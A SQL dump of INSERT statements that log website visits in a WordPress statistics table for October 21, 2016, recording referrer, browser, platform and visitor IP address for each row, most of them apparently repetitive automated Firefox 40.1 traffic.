INSERT INTO `wp_statistics_visitor` VALUES (9120, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '109.146.33.166', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9121, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '109.184.210.184', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9122, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '209.232.13.143', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9123, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '27.99.1.190', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9124, '2016-10-21', 'https://www.google.com/', 'Firefox', 'Windows', '49.0', '', '146.115.81.16', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9125, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '119.152.72.142', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9126, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '101.180.248.116', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9127, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '122.177.84.238', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9128, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '95.18.199.12', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9129, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '94.226.110.42', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9130, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '189.27.205.31', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9131, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '112.210.91.70', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9132, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '99.224.254.199', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9133, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '171.49.216.237', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9134, '2016-10-21', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=3&ved=0ahUKEwig17-S3erPAhXLORoKHVyqDbAQFggxMAI&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Faeroduster-ms-222n%2F&usg=AFQjCNEzu3QEEZ2Lv4bMlDb0Yu2v32f_0Q&bvm=bv.136499718,d.cWw', 'MSIE', 'Windows', '11.0', '', '153.2.246.37', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9135, '2016-10-21', 'https://www.google.ca/aclk?sa=L&ai=DChcSEwiRl9Xu0-rPAhWRiGkKHa4zBTAYABAA&ei=MWMJWOq0J4y3jwT75qrgAQ&sig=AOD64_2LzVr_CF5GY66hVu_VHqv1en-AKg&rct=j&q=&sqi=2&ved=0ahUKEwiqkdHu0-rPAhWM24MKHXuzChwQ0QwINA&adurl=', 'MSIE', 'Windows', '11.0', '', '174.2.109.74', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9136, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '110.159.29.99', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9137, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '1.5', '', '217.174.192.132', '000', 119, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9138, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '204.9.211.253', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9139, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '60.91.81.187', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9140, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '5.100.96.66', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9141, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '180.191.122.6', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9142, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '124.6.153.146', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9143, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '103.206.83.66', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9144, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '45.72.141.198', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9145, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '201.239.21.74', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9146, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '105.10.169.64', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9147, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '108.85.237.231', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9148, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '175.141.38.219', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9149, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '91.144.19.125', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9150, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '77.29.141.2', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9151, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '156.218.145.186', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9152, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '123.231.111.239', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9153, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '112.163.156.63', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9154, '2016-10-21', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.101', '', '61.135.221.56', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9155, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '182.65.18.71', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9156, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '103.199.98.122', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9157, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '180.191.61.14', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9158, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '36.76.235.238', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9159, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '197.119.94.186', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9160, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '180.191.61.2', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9161, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '182.186.100.133', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9162, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '103.18.72.93', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9163, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '41.143.156.178', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9164, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '49.205.45.47', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9165, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '69.157.250.251', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9166, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '77.31.30.89', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9167, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '41.133.134.193', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9168, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '177.209.4.234', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9169, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '180.253.16.232', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9170, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '115.178.25.174', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9171, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '103.240.241.247', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9172, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '107.3.88.16', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9173, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '148.0.171.84', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9174, '2016-10-21', 'https://www.miller-stephenson.com', 'BoogleBot2', 'Unknown', 'Unknown', '', '54.197.209.117', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9175, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '110.168.55.132', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9176, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '112.208.161.148', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9177, '2016-10-21', 'https://www.miller-stephenson.com/', 'Chrome', 'Macintosh', '39.0.2171.99', '', '188.208.1.73', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9178, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '210.212.156.230', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9179, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '174.98.165.173', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9180, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '91.139.144.27', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9181, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '217.99.154.131', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9182, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '103.57.92.72', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9183, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '119.74.59.110', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9184, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '202.188.59.124', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9185, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '112.201.93.1', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9186, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '98.252.89.207', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9187, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '74.72.243.67', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9188, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '190.104.119.63', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9189, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '177.93.220.166', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9190, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '119.92.77.101', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9191, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '98.184.184.91', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9192, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '67.215.23.141', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9193, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '36.81.164.104', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9194, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '75.44.83.169', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9195, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '190.200.169.212', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9196, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '31.208.137.10', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9197, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '112.210.83.35', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9198, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '41.228.227.13', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9199, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '122.3.187.105', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9200, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '41.103.197.226', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9201, '2016-10-21', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '24.190.84.251', '000', 12, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9202, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '189.217.103.15', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9203, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '175.144.127.190', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9204, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '182.55.184.190', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9205, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '202.29.210.204', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9206, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '111.93.249.74', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9207, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '5.28.163.219', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9208, '2016-10-21', 'https://www.miller-stephenson.com', 'Java', 'Unknown', '1.6.0', '', '51.175.135.105', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9209, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '37.34.172.64', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9210, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '184.53.48.118', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9211, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '79.112.101.176', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9212, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '84.61.82.242', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9213, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '154.127.34.3', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9214, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '62.68.110.209', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9215, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '87.103.215.106', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9216, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '218.54.91.42', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9217, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '86.188.103.54', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9218, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '189.13.221.21', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9219, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '186.225.219.2', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9220, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '168.121.66.18', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9221, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '108.214.146.154', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9222, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '77.234.44.181', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9223, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '89.138.96.22', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9224, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '190.226.92.124', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9225, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '93.137.225.185', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9226, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '73.79.233.88', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9227, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '68.231.82.113', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9228, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '39.36.172.147', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9229, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '75.70.229.54', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9230, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '108.93.125.203', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9231, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '69.127.26.111', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9232, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '80.215.88.75', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9233, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '2.50.53.63', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9234, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '86.146.122.31', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9235, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '94.197.121.40', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9236, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '76.185.238.170', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9237, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '41.140.238.148', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9238, '2016-10-21', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.58.185', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9239, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '216.229.75.206', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9240, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '27.114.178.167', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9241, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '112.211.64.15', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9242, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '186.155.157.24', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9243, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '125.27.131.228', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9244, '2016-10-21', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '50.169.142.56', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9245, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '85.202.149.187', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9246, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '112.200.199.86', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9247, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '49.147.28.193', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9248, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '117.196.214.156', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9249, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '109.65.0.189', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9250, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '186.220.195.247', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9251, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '67.211.122.158', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9252, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '134.19.218.122', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9253, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '185.22.90.110', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9254, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '120.29.66.222', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9255, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '95.102.140.35', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9256, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '114.155.168.171', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9257, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '76.122.77.3', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9258, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '200.123.209.210', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9259, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '117.104.225.216', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9260, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '123.231.108.112', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9261, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '156.216.223.131', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9262, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '186.158.227.173', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9263, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '2.233.125.199', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9264, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '117.196.10.216', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9265, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '179.105.149.150', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9266, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '41.60.169.254', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9267, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '209.95.50.127', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9268, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '62.235.14.181', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9269, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '37.223.55.14', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9270, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '41.248.53.245', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9271, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '202.80.215.229', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9272, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '71.80.73.5', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9273, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '41.46.239.151', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9274, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '95.68.244.82', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9275, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '104.163.156.62', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9276, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '103.43.5.34', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9277, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '211.221.146.132', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9278, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '210.195.207.46', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9279, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '131.161.83.245', '000', 2, 0); 
